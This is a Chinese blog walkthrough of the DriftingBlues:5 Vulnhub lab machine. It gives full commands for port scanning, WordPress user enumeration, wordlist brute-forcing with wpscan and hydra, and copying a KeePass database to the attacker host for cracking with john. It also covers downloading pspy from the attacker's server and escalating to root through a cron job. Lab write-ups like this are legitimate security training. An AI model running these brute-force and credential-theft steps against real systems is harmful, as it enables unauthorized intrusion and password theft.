Vulnhub-driftingbules:5 靶机复现完整过程

已于 2023-09-26 15:21:49 修改
阅读量334 收藏 1
点赞数
分类专栏: # 红队打靶 文章标签: 网络安全 web安全
于 2023-09-24 11:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Continuejww/article/details/133144481
版权

kali的IP地址:192.168.200.14
靶机IP地址:192.168.200.60

一、信息收集

1.对利用nmap目标靶机进行扫描

由于arp-scan属于轻量级扫描,在此直接使用nmap进行对目标靶机扫描开放端口

nmap -A -p 1-65535 192.168.200.60

使用nmap扫描 开放的端口是22(ssh)、80(http)端口
image.png

2.访问网站

发现框架是wordpress框架,或者也可以使用wappalyzer、whatweb
image.png
既然是wordpress系统,那么后台登录页面就是wp-login.php
image.png

二、漏洞探测

3.wpsan 爆用户名

使用专门扫描wordpress得wpsan
使用wpscan扫描下账户信息,发现gadd、gill、collins、satanic、abuzerkomurcu账户。

wpscan --url "http://192.168.200.60/" -e u #对目标网页进行扫描

image.png
此时,已经拥有了用户名将之保存到username.txt下,在寻找登陆密码

gobuster dir -u http://192.168.200.60  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x php,jpg,txt,html

image.png
image.png
对网站进行扫描之后,没有发现密码本类似得信息

4.用 cewl 爬取网站密码:

cewl -m 6 -w passwd.txt http://192.168.200.60 # 爬取网页信息,保存到passwd.txt中

image.png

5.wpscan爆破后台登录账户密码

对刚才发现的几个账户进行密码爆破,

wpscan --url http://192.168.200.60 -U username.txt -P passwd.txt

image.png
有一组符合条件

账户名:gill
密码:interchangeable

成功进入后台
image.png
这个图片在index.php页面没有显示被隐藏,那么首先进行图片隐写的研究
image.png
右键复制链接下载到kali当中。

wget 192.168.200.60/wp-content/uploads/2021/02/dblogo.png # 下载

6.识别图片隐藏信息

Exiftool dblogo.png
这个工具可以识别出一些我们在一般情况下无法识别的图片中的信息

有ssh 的密码,用户名用之前的那五个用户名试试
image.png
image.png

用之前wpsacn扫描出得五个账户名进行尝试
提供得SSH密码为:59583hello

7.九头蛇爆破

hydra -L username.txt -p 59583hello ssh://192.168.200.60

image.png
使用用得到的账户和密码进行SSH登录
image.png
查看文件,得到的第一个flag
image.png
而尝试查看具有提权 得线索后,也没有什么用途那么只能从kbdx文件找入手得点了。
image.png

8.KDBX文件利用

目录下有个 kdbx 文件 :
KDBX文件:由密码管理器KeePass Password Safe创建的文件;存储密码的加密数据库,该数据库只能使用用户设置的主密码进行查看; 用于安全存储Windows,电子邮件帐户,FTP站点,电子商务站点和其他目的的个人登录凭据。
将kbx文件下载到kali

scp -rp gill@192.168.200.60:/home/gill/keyfile.kdbx /tmp

image.png

9.keepass2john 工具获取hash

传到 kali 上破解,kali 上有个 keepass2john 工具,可以获取 kdbx 文件中的密码哈希值
image.png

10.john 暴破哈希值

有哈希值,尝试用 john 暴破哈希值
image.png

得到个密码:porsiempre,无法切换到root用户。
第一种方法:利用keepass工具。导入 kdbx 文件并填写刚才暴破出来的密码
标题可能会是root得密码

2real4surreal 
buddyretard
closet313
exalted
fracturedocean
zakkwylde

image.png
image.png
第二种利用在线工具:https://app.keeweb.info/
将kdbx文件上传,输入john爆破得hash密码登录
image.png
回到kali得终端,发现根目录下存在keyfolder,发现 /keyfolder,这应该就是 KeePass 的文件。
image.png
这个文件得权限只有root得用户和其他用户有权限操作,但是进入文件夹之后可以看到是个空文件夹。
里面应该隐藏信息, 上传pspy64,赋予执行权限,然后执行该文件,发现定时执行/root/key.sh文件,根据名字猜测是和密码有关

在kali上开启一个http服务,然后利用wget 192.168.200.14:8000/pspy64指令上传至靶机

下载pspy64链接。

https://github.com/DominicBreuker/pspy

image.png

三、定时任务提权

根据大佬文章提示,使用keyfile.kdbx文件中的名称,新建文件,一旦建立正确的文件名,就会获得一个新的文件。
(注:耐心等待)
image.png
密码:imjustdrifting31
image.png
至此,结束!

总结:
1.nmap扫描开放端口
2.cewl 生成字典、针对wordpress文件系统得wpscan 工具暴破使用、九头蛇爆破工具
2.Exiftool 来对EXIF信息解析
3…kdbx文件密码破解
4.若开启不了web服务可以使用scp这个命令

scp 用户名@靶机IP地址:/home/gill/key* /root

5.解密 keepass 数据库获取密码
6.定时任务提权,下载脚本pspy64 ,创建与之对应得key文件提权。

补充:SCP
SCP是linux系统下基于SSH登陆进行安全的远程文件拷贝命令,复制文件和目录
格式:

 scp [参数] [原路径] [目标路径]

参考文章:https://www.cnblogs.com/sainet/p/16302229.html

爱吃大米饭'
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
grotesque_vh-1.0.1 vulnhub靶场通关 (keepass2john)
weixin_62621015的博客
03-24 325
grotesque_vh-1.0.1 vulnhub靶场通关 (keepass2john)
VulnHub—DriftingBlues: 5
Cobra的博客
04-06 1877
一、信息收集 1、使用nmap扫描存活主机 2、发192.168.189.158开放了80和22端口,访问其80端口 3、发是用wordpress搭建的站点,对其进行目录扫描发wordpress后台 4、尝试使用wpscan对用户名和密码进行爆破 先用cewl生成相应的字典 cewl -m 6 -w passwd.txt http://192.168.189.158/ 成功爆出一个用户的密码 5、使用改用户登录之后发一张跟靶机主题相关的图片 6.
靶机渗透练习05-driftingblues5
Force~
03-29 2182
靶机地址: https://www.vulnhub.com/entry/driftingblues-5,662/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 781
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1925
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Kioptrix2-WalkThrough 靶机.docx
10-18
本文将对 Kioptrix2 靶机的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,以确定靶机的 IP 地址。在这里,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何用IP地址申请SSL证书实网络安全
2401_84891336的博客
07-10 378
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1232
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
网络安全防御【防火墙NAT智能选举综合实验】
miss_copper的博客
07-13 830
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
智能车的网络安全隐患及其防护技术
tigerman20201的博客
07-13 210
本文分析了智能车的主要网络安全威胁,包括车辆通信系统、自动驾驶系统、以及车载娱乐系统的潜在风险。在此基础上,提出了多层次的安全防护技术,包括加密通信、入侵检测系统、以及区块链技术等,以提升智能车的网络安全水平。智能车的网络安全是一个杂且重要的问题,需要多层次、多方面的技术防护。通过加密通信、入侵检测系统、区块链技术等多种手段的结合,可以有效提升智能车的安全性,保障乘客和行人的安全。未来,随着技术的进步和标准的完善,智能车的网络安全将得到进一步的保障。**题目:智能车的网络安全隐患及其防护技术**
7.13实训日志
最新发布
Kidding_Ma的博客
07-13 146
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了关于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全法视角下的等保测评法律责任与风险控制
ddcajdkdl的博客
07-11 409
直接责任人员处罚:对于违反网络安全法规定,导致严重后果的,不仅单位要承担责任,直接负责的主管人员和其他直接责任人员也可能被处以罚款,甚至追究刑事责任。该法于2017年6月1日正式实施,其中对网络安全等级保护制度(简称“等保”)做出了明确规定,要求网络运营者根据其网络的重要程度及潜在影响,实施相应级别的安全保护措施。综上所述,从《网络安全法》的角度出发,等保测评不仅是法律规定的强制性要求,也是企业自我保护、规避法律风险、维护信誉和业务连续性的关键措施。
网络安全——防御实验
Nirvana92的博客
07-09 1077
# 防御实验一 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/63794e616c244387a03fae34450d6f00.png) #### 拓扑结构展示: ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb297641443c4f78b6c93c432e2b5286.png) ## 一、 ### 根据题目,先为办公区做**安全策略**主要策略有以下几点: 1、书写名称和描述,名称和描述要**明确**,让除本人
网络安全合规建设
weixin_68864415的博客
07-09 881
简单介绍了企业网络安全合规的问题
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值